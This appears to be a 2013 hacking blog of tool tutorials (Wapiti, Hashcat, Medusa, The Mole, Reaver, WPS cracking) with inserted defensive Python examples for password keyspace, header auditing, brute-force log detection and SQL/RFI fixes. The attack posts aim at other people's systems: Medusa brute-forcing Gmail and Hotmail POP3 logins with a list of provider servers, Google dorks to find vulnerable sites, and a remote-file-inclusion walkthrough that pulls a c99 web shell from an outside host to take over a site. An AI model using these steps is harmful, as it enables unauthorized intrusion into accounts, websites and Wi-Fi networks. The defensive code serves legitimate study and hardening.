Wednesday, January 30, 2013

Wapiti - Server vulnerability scans

Wapiti is a tool written in Python that analyzes websites.
You can download Wapiti from here.
It works with Python > 2.4 and < 3.0.
Wapiti can detect the following vulnerabilities:
-File handling errors (local and remote include/require, fopen, readfile, ...)
-Database injection (PHP/JSP/ASP SQL injection and XPath injection)
-XSS (Cross Site Scripting) injection
-LDAP injection
-Command execution detection (eval(), system(), passthru(), ...)
-CRLF injection (HTTP response splitting, session fixation, ...)
To run Wapiti type : ./wapiti.py url
The most important options are:
-s : specify a URL to start with
-x : exclude a URL from the scan
-p : specify a proxy
-t : set the timeout
-v : set the verbosity level: 0 = quiet (default), 1 = print each URL, 2 = print every attack
-o : set the name of the report file

Example :
./wapiti.py http://site.com -o /home/HackForLulz/result
Target = site.com
Output = /home/HackForLulz/result

./wapiti.py http://site.com -p 127.0.0.1:9050 -o /home/HackForLulz/result
Target = site.com
Output = /home/HackForLulz/result
Proxy = 127.0.0.1:9050 (SOCKS5) <- routes the scan through Tor

./wapiti.py http://site.com -x http://site.com/admin -n 100
Target = site.com
Exclude = http://site.com/admin <- Exclude directory /admin
Max url = 100

If you have a problem or you need some explanations just write under this post!

Sunday, January 27, 2013

WPS crack

So, what is WPS?
WPS (Wi-Fi Protected Setup) is a computing standard that attempts to make setting up a secure wireless home network easy.

Why is it vulnerable?
WPS has been shown to fall easily to brute-force attacks (discovered by Stefan Viehböck).
WPS asks for an 8-digit PIN (the last digit is a checksum), so there are 10^8 combinations, but WPS tells you separately when the first 4 digits and when the last 3 digits are correct, so only 10^4 + 10^3 (11000) combinations have to be tried.

How can we exploit this vulnerability?
There are two tools (written by Stefan Viehböck):
-Reaver
-wpscrack

If you have a problem or you need some explanations just write under this post!

Tuesday, January 22, 2013

Hashcat - Advanced password recovery

Hashcat is an advanced tool for password recovery.
You can download Hashcat from here.
Hashcat supports 6 attack modes:
-0 = Straight
-1 = Combination
-2 = Toggle-case
-3 = Brute-force
-4 = Permutation
-5 = Table-lookup
Hashcat supports a lot of algorithms, such as MD5, SHA1, MySQL, phpass, MD4, SHA256, SHA512, OS X and vBulletin.
Hashcat runs on all Linux distributions, Windows and Mac OS X.
Syntax : hashcat [options] hashfile [mask|wordfiles|directories]
-m : Hash-type, see references below
-a : Attack-mode
-o : Output file
-n : Number of threads
--pw-min=NUM Password-length minimum
--pw-max=NUM Password-length maximum
--custom-charset1=CS User-defined charsets
Charset :
-?l = abcdefghijklmnopqrstuvwxyz
-?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
-?d = 0123456789
-?s = !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
-?a = ?l?u?d?s
-?h = 8 bit characters from 0xc0 - 0xff
-?D = 8 bit characters from german alphabet
-?F = 8 bit characters from french alphabet
-?R = 8 bit characters from russian alphabet
For more info type : hashcat -h

Hash type :
0 = MD5
10 = md5($pass.$salt)
20 = md5($salt.$pass)
50 = HMAC-MD5 (key = $pass)
60 = HMAC-MD5 (key = $salt)
100 = SHA1
110 = sha1($pass.$salt)
120 = sha1($salt.$pass)
150 = HMAC-SHA1 (key = $pass)
160 = HMAC-SHA1 (key = $salt)
200 = MySQL
300 = MySQL4.1/MySQL5
400 = phpass, MD5(Wordpress), MD5(phpBB3)
500 = md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5
800 = SHA-1(Django)
900 = MD4
1000 = NTLM
1100 = Domain Cached Credentials, mscash
1400 = SHA256
1410 = sha256($pass.$salt)
1420 = sha256($salt.$pass)
1450 = HMAC-SHA256 (key = $pass)
1460 = HMAC-SHA256 (key = $salt)
1600 = md5apr1, MD5(APR), Apache MD5
1700 = SHA512
1710 = sha512($pass.$salt)
1720 = sha512($salt.$pass)
1750 = HMAC-SHA512 (key = $pass)
1760 = HMAC-SHA512 (key = $salt)
1800 = SHA-512(Unix)
2600 = Double MD5
3300 = MD5(Sun)
3500 = md5(md5(md5($pass)))
3610 = md5(md5($salt).$pass)
3710 = md5($salt.md5($pass))
3810 = md5($salt.$pass.$salt)
3910 = md5(md5($pass).md5($salt))
4010 = md5($salt.md5($salt.$pass))
4110 = md5($salt.md5($pass.$salt))
4210 = md5($username.0.$pass)
4300 = md5(strtoupper(md5($pass)))
4400 = md5(sha1($pass))
4500 = sha1(sha1($pass))
4600 = sha1(sha1(sha1($pass)))
4700 = sha1(md5($pass))
4800 = MD5(Chap)
5000 = SHA-3(Keccak)


Example :
hashcat -m 0 -a 3 -n 5 --pw-min=3 --pw-max=5 --custom-charset1=?l hash.txt ?1?1?1?1?1 -o /home/HackForLulz/result
Type = MD5 (0 = MD5)
Attack mode = Brute-force (3)
Threads = 5
Min length of password = 3
Max length of password = 5
Charset = ?l -> abcdefghijklmnopqrstuvwxyz
Hash = /home/HackForLulz/hash.txt
?1?1?1?1?1 = after each ? you specify the "type" (charset) of that character position; for example if the first character is b you can specify ?l (because b is in the ?l charset); if you don't know, use ?1 (the custom charset)
Output = /home/HackForLulz/result <- file

hashcat -m 1400 -a 3 -n 5 --pw-min=4 --pw-max=7 --custom-charset1=?l?u?d?s hash.txt ?l?1?1?1?1?1?1 -o /home/HackForLulz/hash
Type = SHA256 (1400 = SHA256)
Threads = 5
Min length of password = 4
Max length of password = 7
Charset = ?l?u?d?s -> abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~ (the same as ?a)
Hash = hash.txt <- file

?l?1?1?1?1?1?d -> the first character is in ?l (abcde...) and the last character is in ?d (0123...)
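Added example (my own Python, not part of hashcat or of this post): an estimator for how many candidates a -a 3 mask produces, built from the charsets listed above and up to four --custom-charsetN definitions. It is the calculation a defender makes when judging whether a password policy survives a mask attack at a known hashing rate. Assumptions, also labelled in the code: the ?D/?F/?R locale charsets are not modelled, a character listed twice in a charset is counted once, with --pw-min/--pw-max each length in the range is modelled as the mask cut to that length, and the hashing rate used in the demo is a made-up figure.

```python
import string

# Built-in charsets as listed in the hashcat help quoted above (?D/?F/?R are
# locale-specific and not modelled here).
BUILTIN_CHARSETS = {
    "l": string.ascii_lowercase,
    "u": string.ascii_uppercase,
    "d": string.digits,
    "s": string.punctuation,  # the same 32 symbols as the ?s line above
    "h": "".join(chr(c) for c in range(0xC0, 0x100)),  # 64 high-bit characters
}
BUILTIN_CHARSETS["a"] = "".join(BUILTIN_CHARSETS[k] for k in "luds")


def expand_charset(spec, custom=None):
    """Expand a charset definition such as '?l?u?d?s' or 'abc?d' into the
    distinct characters it contains; '??' stands for a literal '?'."""
    custom = custom or {}
    chars = []
    i = 0
    while i < len(spec):
        if spec[i] == "?":
            if i + 1 >= len(spec):
                raise ValueError("dangling '?' in %r" % spec)
            key = spec[i + 1]
            if key == "?":
                block = "?"
            elif key in custom:          # --custom-charsetN may itself use built-ins
                block = expand_charset(custom[key], custom)
            elif key in BUILTIN_CHARSETS:
                block = BUILTIN_CHARSETS[key]
            else:
                raise ValueError("unknown charset ?%s" % key)
            i += 2
        else:
            block = spec[i]
            i += 1
        for c in block:
            if c not in chars:           # assumption: a duplicated character counts once
                chars.append(c)
    return "".join(chars)


def parse_mask(mask, custom=None):
    """Split a mask into one charset per password position."""
    positions = []
    i = 0
    while i < len(mask):
        if mask[i] == "?":
            positions.append(expand_charset(mask[i:i + 2], custom))
            i += 2
        else:
            positions.append(mask[i])    # a literal character: exactly one choice
            i += 1
    return positions


def mask_keyspace(mask, custom=None, pw_min=None, pw_max=None):
    """Number of candidates the mask produces. Assumption: with
    --pw-min/--pw-max every length in the range is tried using the first
    `length` positions of the mask (lengths longer than the mask are skipped)."""
    positions = parse_mask(mask, custom)
    lo = len(positions) if pw_min is None else pw_min
    hi = len(positions) if pw_max is None else min(pw_max, len(positions))
    total = 0
    for length in range(lo, hi + 1):
        count = 1
        for charset in positions[:length]:
            count *= len(charset)
        total += count
    return total


def seconds_to_exhaust(mask, rate_per_second, custom=None, pw_min=None, pw_max=None):
    """Worst-case time to try every candidate at a given hashing rate."""
    return mask_keyspace(mask, custom, pw_min, pw_max) / rate_per_second


if __name__ == "__main__":
    # The two masks from the examples above.
    print(mask_keyspace("?1?1?1?1?1", {"1": "?l"}, 3, 5))
    print(mask_keyspace("?l?1?1?1?1?1?1", {"1": "?l?u?d?s"}, 4, 7))
    # Hours to exhaust the second mask at a hypothetical 1e9 hashes per second.
    print(seconds_to_exhaust("?l?1?1?1?1?1?1", 1e9, {"1": "?l?u?d?s"}, 4, 7) / 3600)
```

Running it prints the candidate counts for the two masks in the examples above: the first mask yields 26^3 + 26^4 + 26^5 candidates, the second 26 times the sum of 94^3 through 94^6, which is why adding symbols and length to a policy matters far more than the choice of hash algorithm for an unsalted fast hash like MD5 or SHA256.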

If you have any problem or if you need some explanations just write under this post!

Monday, January 21, 2013

uWebScan - Web application vulnerability scanner

uWebScan is a small modular web scanner written in Python.
It is not meant as a replacement for Nikto or similar scanners.
List of modules (S = SAFE, N = NOT SAFE):
-[S] apacheversion : Apache HTTPD version detection
-[S] bigipcookie : F5 BIG-IP cookie IP exposure
-[S] httpheaders : HTTP headers available
-[S] httpoptions : HTTP OPTIONS available
-[S] httptracevuln : HTTP TRACE vulnerability
-[S] intipvuln : internal IP vulnerability
-[S] ntlmvuln : NTLM authentication vulnerability
-[S] propfindvuln : PROPFIND (WebDAV) vulnerability
-[S] robotstxtvuln : robots.txt "Disallow" disclosure
-[N] webr00t : file & directory enumeration
-[S] webtime : web server clock check
You can download uWebScan from here.
uWebScan needs Python < 3.0.
Syntax : ./uWebScan.py -h host -m module
-m : modules to run (default = all modules)
-o : output file
-p : port
-s : use SSL
-l : list the modules
-n : disable safe mode (default : safe mode enabled)

Example :
./uWebScan.py -h www.site.com -m -s -o /home/HackForLulz/result
Host = site.com
Module = All (except NOT SAFE modules)
ssl = Enabled
Output file = /home/HackForLulz/result

./uWebScan.py -h www.site.com -m apacheversion bigipcookie httpheaders -s
Host = site.com
Modules = apacheversion, bigipcookie, httpheaders
ssl = Enabled

./uWebScan.py -h www.site.com -m -n
Host = site.com
Module = All (SAFE AND NOT SAFE)
ssl = Disabled

For more information type : ./uWebScan -h
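Added example (my own Python, not uWebScan's code): the passive checks behind four of the SAFE modules above (apacheversion, httptracevuln, intipvuln, bigipcookie) run over a constructed HTTP response, which is how you would audit your own server's headers without sending anything but a normal request. Assumptions: the response text is made up for this example, and the BIG-IP cookie is assumed to use the classic "<ip>.<port>.0000" encoding where both numbers are little-endian integers.

```python
import ipaddress
import re

# Constructed sample response (not captured from any real host).
SAMPLE_RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "Server: Apache/2.2.22 (Ubuntu)\r\n"
    "Allow: GET,HEAD,POST,OPTIONS,TRACE\r\n"
    "Location: http://10.0.0.12/login\r\n"
    "Set-Cookie: BIGipServerpool_web=1677787402.36895.0000; path=/\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

# Constructed response from a server that discloses none of the above.
CLEAN_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "Allow: GET,HEAD,POST\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def parse_headers(raw):
    """Return (status line, [(lower-case name, value), ...]) for a raw HTTP response."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def decode_bigip_cookie(value):
    """Decode the classic BIG-IP persistence cookie '<ip>.<port>.0000' (assumed
    format): the IPv4 address is a little-endian 32-bit integer, the port a
    little-endian 16-bit integer. Returns (ip, port) or None."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.0000", value)
    if not m:
        return None
    try:
        ip = ".".join(str(b) for b in int(m.group(1)).to_bytes(4, "little"))
        port = int.from_bytes(int(m.group(2)).to_bytes(2, "little"), "big")
    except OverflowError:
        return None
    return ip, port


def audit_response(raw):
    """Passive checks: version disclosure, TRACE enabled, internal IP leakage
    and BIG-IP cookie exposure. Returns a list of (module name, description)."""
    _, headers = parse_headers(raw)
    findings = []
    for name, value in headers:
        if name == "server" and re.search(r"/\d", value):
            findings.append(("apacheversion", "server version disclosed: " + value))
        if name == "allow" and "TRACE" in [m.strip().upper() for m in value.split(",")]:
            findings.append(("httptracevuln", "TRACE method is enabled"))
        for addr in IPV4_RE.findall(value):
            try:
                if ipaddress.ip_address(addr).is_private:
                    findings.append(("intipvuln", "internal address %s in %s header" % (addr, name)))
            except ValueError:
                pass  # matched the regex but is not a valid address (e.g. 999.1.1.1)
        if name == "set-cookie" and value.startswith("BIGipServer"):
            cookie_value = value.split(";", 1)[0].partition("=")[2]
            decoded = decode_bigip_cookie(cookie_value)
            if decoded:
                findings.append(("bigipcookie", "backend %s:%d exposed by cookie" % decoded))
    return findings


if __name__ == "__main__":
    for module, text in audit_response(SAMPLE_RESPONSE):
        print("[%s] %s" % (module, text))
```

The sample response trips all four checks; the fixes on the server side are ServerTokens Prod (no version), TraceEnable off, rewriting Location to the public name instead of the backend address, and enabling cookie encryption on the load balancer so the cookie no longer encodes the pool member's address.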

If you have any problem or if you need some explanations just write under this post!

Saturday, January 19, 2013

Medusa - bruteforce

Medusa is open source software for brute-force login attacks.
Medusa supports a lot of modules:
-AFP
-CVS
-FTP
-HTTP
-IMAP
-MS-SQL
-MySQL
-NCP (NetWare)
-NNTP
-PcAnywhere
-POP3
-PostgreSQL
-rexec
-rlogin
-rsh
-SMB
-SMTP (AUTH/VRFY)
-SNMP
-SSHv2
-SVN
-Telnet
-VmAuthd
-VNC
-Web-form
-Wrapper

Install

Ubuntu :
sudo apt-get install linux-headers-$(uname -r) build-essential make patch subversion libssl-dev libncp libncp-dev libpq5 libpq-dev libssh2-1 libssh2-1-dev libgcrypt11-dev libgnutls-dev libsvn-dev
sudo apt-get install medusa

Archlinux : download the tarball from here
tar -zxvf medusa.tar.gz
cd medusa
makepkg -csi

Start


Syntax: medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] -M module [OPT]
-h : Target hostname or IP address
-H : File with target hostnames or IP addresses
-u : Username to test
-U : File with usernames to test
-p : Password to test
-P : File with passwords to test
-M : Name of the module to execute
Most important [OPT]:
-O : File to append log information to
-d : Dump all known modules
-n : Use a non-default TCP port number
-s : Enable SSL
-g [NUM] : Give up after trying to connect for NUM seconds (default 3)
-r [NUM] : Sleep NUM seconds between retry attempts (default 3)
-t [NUM] : Total number of logins to be tested concurrently
-T [NUM] : Total number of hosts to be tested concurrently
-L : Parallelize logins using one username per thread. The default is to process the entire username before proceeding.
-q : Display module's usage information
-v [NUM] : Verbose level [0 - 6 (more)]

Example :
medusa -h pop.gmail.com -u hackforlulz@gmail.com -P /home/HackForLulz/wordlist -s -M POP3
Host = pop.gmail.com
Username = hackforlulz@gmail.com
Passwords = File /home/HackForLulz/wordlist
ssl = enabled
Module = POP3

medusa -h pop3.live.com -U /home/HackForLulz/user -P /home/HackForLulz/wordlist -n 995 -M POP3
Host = pop3.live.com
Username = /home/HackForLulz/user <- file
Passwords = File /home/HackForLulz/wordlist
Port = 995
Module = POP3

The most popular email servers are :
GMAIL - pop.gmail.com - smtp.gmail.com (ssl)
LIBERO ADSL - popmail.libero.it – imapmail.iol.it - mail.libero.it
MSN HOTMAIL - pop3.live.com (port 995) smtp.live.com (port 25)
ALICE ADSL - in.alice.it out.alice.it
TIM.IT - mail.posta.tim.it – box.posta.tim.it box.posta.tim.it
ROSSOALICE - in.aliceposta.it – box.tin.it out.aliceposta.it – mail.tin.it
TIN.IT - pop.tin.it – box.tin.it (aliceadsl) – box.clubnet.tin.it – box2.tin.it
VIRGILIO - in.virgilio.it – popmail.virgilio.it out.virgilio.it – smtp.virgilio.it
TISCALI.IT - pop.tiscali.it smtp.tiscali.
ALICEPOSTA.IT - in.alice.it
KATAWEB.IT - mail.katamail.com – pop.katamail.com smtp.katamail.com
LYCOS - pop.lycos.it – pop3.lycos.it smtp.lycos.it
MSN.COM - smtp.email.msn.com pop3.email.msn.com
SUPEREVA.IT - mail.supereva.it mail.supereva.it
VODAFONE MAIL - popmail.vodafone.it - smtp.net.vodafone.it
YAHOO.COM - pop.mail.yahoo.com smtp.mail.yahoo.com
ARUBA.IT - pop3.aruba.it smtp.aruba.it

For more information type in terminal : medusa
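Added example (my own Python, not part of Medusa or of this post), showing the defender's side of the POP3 runs above: a sliding-window detector that flags a client address once it accumulates a threshold of failed logins in a short time, and lists the usernames involved so you can tell a single-account attack (-u) from a username file (-U / -L) being cycled. The log lines are constructed in a generic layout for this example and are not taken from any real mail server.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log in a generic
# "<ISO timestamp> <service>: auth <result> user=<name> rip=<client ip>" layout.
SAMPLE_LOG = """\
2013-01-19T10:00:01 pop3-login: auth failed user=alice rip=203.0.113.5
2013-01-19T10:00:01 pop3-login: auth failed user=bob rip=203.0.113.5
2013-01-19T10:00:02 pop3-login: auth failed user=alice rip=203.0.113.5
2013-01-19T10:00:02 pop3-login: auth failed user=bob rip=203.0.113.5
2013-01-19T10:00:03 pop3-login: auth failed user=alice rip=203.0.113.5
2013-01-19T10:00:03 pop3-login: auth failed user=bob rip=203.0.113.5
2013-01-19T10:00:05 pop3-login: auth ok user=carol rip=198.51.100.7
2013-01-19T10:03:00 pop3-login: auth failed user=carol rip=198.51.100.7
2013-01-19T10:09:00 pop3-login: auth failed user=carol rip=198.51.100.7
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<svc>\S+): auth failed user=(?P<user>\S+) rip=(?P<ip>\S+)$"
)


def parse_failure(line):
    """Return (timestamp, user, ip) for a failed-login line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%Y-%m-%dT%H:%M:%S")
    return ts, m.group("user"), m.group("ip")


def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Flag a client IP the first time it accumulates `threshold` failed logins
    inside a sliding `window`. Lines must be in chronological order.
    Two typos spread over minutes (198.51.100.7 below) never reach the
    threshold; a tool cycling a wordlist does within seconds."""
    recent = defaultdict(deque)   # ip -> deque of (timestamp, user) inside the window
    alerted = set()
    alerts = []
    for line in lines:
        event = parse_failure(line)
        if event is None:
            continue
        ts, user, ip = event
        q = recent[ip]
        q.append((ts, user))
        while q and ts - q[0][0] > window:
            q.popleft()           # drop failures that fell out of the window
        if len(q) >= threshold and ip not in alerted:
            alerted.add(ip)
            alerts.append({
                "ip": ip,
                "failures": len(q),
                "users": sorted({u for _, u in q}),
                "first": q[0][0],
                "last": ts,
            })
    return alerts


if __name__ == "__main__":
    for a in detect_bruteforce(SAMPLE_LOG.splitlines()):
        print("%s: %d failures against %s between %s and %s"
              % (a["ip"], a["failures"], ", ".join(a["users"]), a["first"], a["last"]))
```

Note that Medusa's -T and -t options spread a run over several hosts and connections; a per-source threshold like this one is defeated by an attacker using many source addresses, so in practice you also watch per-account failure counts and rate-limit at the service.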

If you have any problem or if you need some explanations just write under this post!

Thursday, January 17, 2013

Themole - Sqlinjection

The Mole is an automatic SQL injection exploitation tool. Given only a vulnerable URL and a valid string on the site, it can detect the injection and exploit it, either with the union technique or with a boolean query based technique.
Features
-Support for injections using MySQL, SQL Server, Postgres and Oracle databases.
-Command line interface. Different commands trigger different actions.
-Auto-completion for commands, command arguments and database, table and column names.
-Support for filters, in order to bypass certain IPS/IDS rules using generic filters, and the possibility of easily creating new ones.
-Exploits SQL injections through GET/POST/Cookie parameters.
-Developed in Python 3.
-Exploits SQL injections that return binary data.
-Powerful command interpreter to simplify its usage.
First of all, download The Mole from the official website here.
It needs Python 3 and the lxml library.
To run it, move into the themole directory (cd) and type : ./mole.py
Now type:
1) url www.website.com/index.php?pag=1
2) needle pag (pag is the vulnerable parameter in the URL)
3) schemas
4) tables dbname
5) columns dbname tablename
6) query dbname tablename column1,column2,column3...
For more information click here
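Added example (my own Python, not The Mole's code): the flaw behind an injectable index.php?pag=1 beside its hardened form, using an in-memory SQLite table with constructed rows. The last function is the regression test a developer can keep: it asks whether a handler responds differently to a true and a false condition appended to the parameter, which is exactly the signal a boolean query based tool looks for, and it must return False for the fixed handler.

```python
import sqlite3


def make_db():
    """In-memory stand-in for the site's database (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, published INTEGER)")
    conn.executemany("INSERT INTO pages VALUES (?, ?, ?)",
                     [(1, "Home", 1), (2, "About", 1), (3, "Secret draft", 0)])
    return conn


def page_titles_vulnerable(conn, pag):
    """The pattern behind index.php?pag=1: the parameter is pasted into the SQL text."""
    sql = "SELECT title FROM pages WHERE published = 1 AND id = " + pag + " ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def page_titles_safe(conn, pag):
    """Hardened version: validate the type, then bind the value as a parameter
    so the database never interprets it as SQL."""
    try:
        page_id = int(pag)
    except ValueError:
        return []   # reject anything that is not a plain integer
    sql = "SELECT title FROM pages WHERE published = 1 AND id = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (page_id,))]


def responds_to_boolean_probe(handler, conn, pag):
    """Regression test: does the handler's output change between a true and a
    false condition appended to the parameter? True means the parameter is
    injectable via the boolean technique; the fixed handler must return False."""
    true_case = handler(conn, pag + " AND 1=1")
    false_case = handler(conn, pag + " AND 1=2")
    return true_case != false_case


if __name__ == "__main__":
    db = make_db()
    print(page_titles_vulnerable(db, "1"))          # ['Home']
    print(page_titles_vulnerable(db, "1 OR 1=1"))   # every row, the unpublished draft included
    print(page_titles_safe(db, "1 OR 1=1"))         # []
    print(responds_to_boolean_probe(page_titles_vulnerable, db, "1"))  # True
    print(responds_to_boolean_probe(page_titles_safe, db, "1"))        # False
```

The vulnerable handler leaks the unpublished row because `published = 1 AND id = 1 OR 1=1` is parsed as `(published = 1 AND id = 1) OR 1=1`; the parameterized handler sends the literal value to the driver, so the same input simply fails the integer check.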

If you have a problem or you need some explanations just write under this post!

Saturday, January 12, 2013

Remote File Inclusion

RFI (Remote File Inclusion) is a type of vulnerability in websites.
It allows an attacker to include a remote file, usually through a script on the web server.
The vulnerability occurs because user-supplied input is used without proper validation.
RFI is an old vulnerability, so vulnerable sites are very few.
So, how do we find a vulnerable site?
We can use Google dorks; for more info about Google dorks click here
What kind of dork can we use?
I recommend dorks like :
inurl:index.php?page=
inurl:index.php?login=
And so on..
Now we need a shell (c100, c99, r57) that is uploaded on a server, for example http://c99.gen.tr/c99.txt
Now we have a vulnerable site and a shell.
www.site.com/index.php?page= (vulnerable site)
www.site.com/index.php?page=www.c99.gen.tr/c99.txt
If we can see the c99 shell, we've got root access on the site.
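Added example (my own Python, not from this post): the unvalidated include pattern the post exploits beside the fix, an allowlist that maps the page= value to a file instead of using the value itself, plus a small scanner over constructed query strings that reports why a value was rejected (remote URL, null byte, traversal, unknown page) so the same rule can feed an access-log alert. The allowlist entries and the query strings are made up for this example; the shell URL is the one quoted in the post above.

```python
from urllib.parse import parse_qs, urlsplit

# Hypothetical allowlist mapping the page= values a site supports to the files
# it actually includes (constructed for this example).
ALLOWED_PAGES = {
    "home": "templates/home.php",
    "login": "templates/login.php",
    "contact": "templates/contact.php",
}


def resolve_page_unsafe(page):
    """The pattern behind index.php?page=: whatever the client sent is the include target."""
    return page


def classify_page_value(page):
    """Explain why a page= value is accepted or rejected. Order matters: a remote
    URL or null byte is reported as such even though it would also fail the
    allowlist, because that detail is what you want in an alert."""
    if urlsplit(page).scheme:
        return "remote URL"
    if "\x00" in page:
        return "null byte"
    if ".." in page.replace("\\", "/").split("/"):
        return "path traversal"
    if page not in ALLOWED_PAGES:
        return "not in allowlist"
    return "allowed"


def resolve_page_safe(page):
    """Hardened version: only allowlisted names map to a file; the client's
    string is never used as a path or URL."""
    if classify_page_value(page) != "allowed":
        return None
    return ALLOWED_PAGES[page]


def suspicious_requests(query_strings):
    """Scan query strings (e.g. taken from an access log) for page= values that
    are not on the allowlist, returning (query string, reason) pairs."""
    hits = []
    for qs in query_strings:
        for value in parse_qs(qs).get("page", []):
            reason = classify_page_value(value)
            if reason != "allowed":
                hits.append((qs, reason))
    return hits


if __name__ == "__main__":
    # Constructed query strings as they might appear in an access log.
    sample = [
        "page=home",
        "page=http://c99.gen.tr/c99.txt",
        "page=../../etc/passwd",
        "page=login%00.jpg",
    ]
    for qs, why in suspicious_requests(sample):
        print(qs, "->", why)
    print(resolve_page_unsafe("http://c99.gen.tr/c99.txt"))  # the include target, unchanged
    print(resolve_page_safe("http://c99.gen.tr/c99.txt"))    # None
```

On the PHP side the equivalent hardening is the same allowlist lookup plus allow_url_include=Off, so that even an unvalidated include cannot fetch a remote file; the classifier here is useful regardless, because it turns the scanner traffic in the post above into a clear log signal.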

If you have a problem or you need some explanations just write under this post!

Friday, January 4, 2013

Reaver - Crack Wifi

Reaver implements a brute force attack against Wi-Fi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases.
Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.
You can download Reaver from here.
To crack a Wi-Fi network we type:
reaver -i <interface in monitor mode> -b <bssid> -vv
For more info about monitor mode and how to find the BSSID click here
For more information about Reaver type :
reaver -h

If you have a problem or you need some explanations just write under this post!